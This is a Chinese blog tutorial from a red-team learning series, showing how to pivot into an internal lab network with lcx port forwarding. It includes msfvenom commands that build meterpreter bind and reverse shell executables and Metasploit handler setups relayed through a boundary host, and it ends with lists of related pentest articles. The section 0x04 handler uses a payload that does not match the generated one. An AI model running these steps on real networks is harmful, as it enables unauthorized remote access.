lcx端口转发
目录
0x01 正向端口转发
0x02 反向端口转发
0x03 msf正向shell
0x04 msf反向shell
注:
边界机器 win08 192.168.222.175
内网机器 win7 192.168.222.137
msf机器 Ubuntu 192.168.222.177
0x01 正向端口转发
在边界机器上执行端口转发命令,让来自指定端口的流量全部转发到内网指定IP指定端口上。
这里关闭了防火墙,在正常情况下请使用netsh来对端口进行开放,详细步骤可以参考以前的文章【使用netsh来进行端口转发】
这里我们将本地53端口的全部流量都转发到内网机器的3389端口,从而进行远程连接
lcx.exe -tran 53 192.168.222.137 3389
当然在执行完之后,我们再确定一下端口是否已经启用
然后我们在本地来进行远程连接
0x02 反向端口转发
如果我们只有当前目标的webshell,并没有边界主机可以利用的话,就可以通过反向端口转发来使内网流量都转发到自己的主机上。
注:这里我们用边界机器win08来代替我们的本地主机
首先在本地机器执行监听
lcx.exe -listen 53 1234
使用netstat -ano 确保端口已经启用
然后在目标机器(win7)上执行
lcx.exe -slave 192.168.222.175 53 127.0.0.1 3389
即将本地3389端口的流量都转发到win8机器的53端口上,如果有边界服务器可以利用的话,则在边界服务器执行该命令,将对应的IP和端口改变就可以了。
然后在本地(win8)远程连接即可
0x03 msf正向shell
使用lcx执行正向端口转发,去连接内网的meterpreter
首先先用msf生成一个马
msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe
然后去边界机器执行lcx的正向端口转发,将来自53端口的流量全部转发到内网的meterpreter上
lcx.exe -tran 53 192.168.222.137 53
然后去内网机器运行我们的马
再回到Ubuntu上,对其进行监听,监听边界机器的53端口即可
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 53
set rhost 192.168.222.175
run
0x04 msf反向shell
反向shell也是一样的道理
首先先生成我们的马,这里回连的IP和端口都是边界机器的
msfvenom -p windows/x64/meterpreter/reverse_tcp lport=53 lhost=192.168.222.175 -f exe >> 123.exe
然后到边界机器上执行监听
lcx.exe -listen 53 8888
到内网机器执行我们的马
回到Ubuntu上,对其进行监听
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lhost 192.168.222.175
set lport 8888
exploit -j
可见第一次并没有成功弹回session,这个使由于lcx的原因,多尝试两次就可以了
文章首发公众号:无心的梦呓(wuxinmengyi)
这是一个记录红队学习、信安笔记,个人成长的公众号
扫码关注即可
lcx端口转发的更多相关文章
- LCX端口转发实现内网突破
工具:lcx.exe 原理:当目标主机仅开放了web服务,而该服务又仅能供内网用户使用,外网用户根本无法直接访问.因此想要让外网用户能能够访问局域网中的系统服务,必须进行端口映射等操作才行.其原理就是 ...
- lcx端口转发 linux版
一.端口转发使用 1.攻击机上执行以下命令 ./lcx -p1 -p2 -m 在本地监听3389端口,并将发送到本机3389端口的数据传递到本机2222端口 2.跳板机上执行以下命令 ./lcx -h ...
- lcx 端口转发
1.查看3389端口开放情况: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStati ...
- [内网渗透]lcx端口转发
0x01 简介 lcx是一款端口转发工具,有三个功能: 第一个功能将本地端口转发到远程主机某个端口上 第二个功能将本地端口转发到本地另一个端口上 第三个功能是进行监听并进行转发使用 Lcx使用的前提是 ...
- linux下内网端口转发工具:linux版lcx [实现远程内网维护]
这个工具以前使用的初衷是内网渗透,需要将内网ssh端口转发到外网服务器上.但这个工具同样适用于运维工程师进行远程内网维护. 当然这一切的前提是内网可以访问外网,检测方法当然就是直接ping 一个外网I ...
- 端口转发 Port Forwarding (一)
0x00First 最近发现一些好用的端口转发工具和技巧,计划认真梳理一下 SSH.NC.LCX.EW.FRP 0x01 SSH隧道端口转发 目前利用SSH隧道(SSH tunneling)进行端口转 ...
- 端口转发工具lcx使用两类
lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口.它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入 ...
- [转]otunnel:一个和lcx差不多的端口转发的工具
这是一个采用Golang编写的和lcx差不多的端口转发的工具,用来突破内网环境 项目地址 ooclab/otunnel 下载地址(内涵各大平台) http://dl.ooclab.com/otunne ...
- LCX端口内网映射转发
这几天在渗透一家奶茶店的时候, 使用溢出攻击获得了奶茶店shell, 截屏以后发现该电脑有安装sqlserver, 但是数据库无法远程连接, 所以我决定使用端口映射工具突破端口连接限制: 我的机器地址 ...
随机推荐
- N个tomcat之间实现Session共享(写的不错,转来的)
以下文章写的比较不错,转来的. tomcat的session共享设置如此简单为什么很少人去用.这个我说的重点. 1.自身的session如果服务器不在同一个网段会有session失效(本人使用的是阿里 ...
- mac下面有epoll?
没有的,但是mac下面有kqueue,跟epoll原理是差不多的. 这个是没办法的,如果实在需要,就用Ubuntu吧,这个也可以无缝迁移. 更多资源,更多文章由小白技术社提供(是我啦)
- 解决ionic 启动页面图片没有显示及启动页出现黑白屏
1.ionic 正确打包完app, 并且按照正常的步骤配置config.xml文件之后 ,启动页面还是不能正常的显示出来,而是黑了一下之后,就进入首页了 原因很有可能就是你没有装cordova-plu ...
- mysql迁移mpp数据库Greenplum
1. 场景描述 因兄弟项目中mysql有点扛不住了,要做sql优化,但是业务有点小复杂,优化起来有点麻烦(sql嵌套有点多),便想着用Mpp数据库Greenplum测试下,看性能和复杂度怎么样,趟趟水 ...
- 撤销git add添加的文件
git add 添加了多余文件 git add . 表示当前目录所有文件,不小心就会提交其他文件 git add 如果添加了错误的文件的话 撤销操作 git status 先看一下add 中的文件 ...
- MySQL之PXC集群搭建
一.PXC 介绍 1.1 PXC 简介 PXC 是一套 MySQL 高可用集群解决方案,与传统的基于主从复制模式的集群架构相比 PXC 最突出特点就是解决了诟病已久的数据复制延迟问题,基本上可以达到实 ...
- CentOS7下使用SonatypeNexus3搭建Docker私有仓库
前置条件:安装docker(如果机器上没有安装的话) //安装一些必要的系统工具: sudo yum install -y yum-utils device-mapper-persistent-dat ...
- D-query
SPOJ - DQUERY 题意 求区间内出现一共有几种数字. 上次写了一个主席树,这次用一下莫队,莫队是离线询问的一种操作,将询问分块,如果在同一个块内就按照右端点排序,如果不在同一个块内就按照块的 ...
- hdu 1078 FatMouse and Cheese(简单记忆化搜索)
题目链接 http://acm.hdu.edu.cn/showproblem.php?pid=1078 题意:给出n*n的格子,每个各自里面有些食物,问一只老鼠每次走最多k步所能吃到的最多的食物 一道 ...
- PythonI/O进阶学习笔记_3.2面向对象编程_python的封装
前言: 本篇相关内容分为3篇多态.继承.封装,这篇为第三篇 封装. 本篇内容围绕 python基础教程这段: 在面向对象编程中,术语对象大致意味着一系列数据(属性)以及一套访问和操作这些数据的方法.使 ...